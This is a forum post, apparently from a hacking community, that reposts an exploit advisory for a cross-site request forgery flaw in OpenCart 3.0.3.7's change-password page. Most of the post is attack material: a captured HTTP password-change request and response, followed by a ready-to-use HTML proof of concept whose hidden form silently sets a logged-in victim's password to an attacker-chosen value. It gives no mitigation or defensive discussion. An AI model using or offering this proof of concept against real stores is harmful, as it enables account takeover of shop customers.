This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,702 With Us For: 244 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF) # Date : 2021/08/06 # Exploit Author : Mert Daş merterpreter@gmail.com # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web : www.opencart.com # Tested on: Server : Xampp # Cross-site request forgery OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. OpenCart is not using any security token to prevent it against CSRF. It is vulnerable to all location inside User panel. Header ---------------------------------------------------------- http://localhost/index.php?route=account/password POST /opencart/index.php?route=account/password HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675 Content-Length: 300 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/index.php?route=account/password Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 Upgrade-Insecure-Requests: 1 -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="password" 123asd! -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="confirm" 123asd! -----------------------------3890527419799841332130342675-- Response HTTP/1.1 302 Found Date: Tue, 08 Jun 2021 16:52:59 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/ Location: http://127.0.0.1/opencart/index.php?route=account/account Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ---------------------------------------------------------- Simple Poc to change user Password <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="1234asd!" /> <input type="hidden" name="confirm" value="1234asd!" /> <input type="submit" value="Submit request" /> </form> </body> </html> Link to comment Share on other sites More sharing options...
Recommended Posts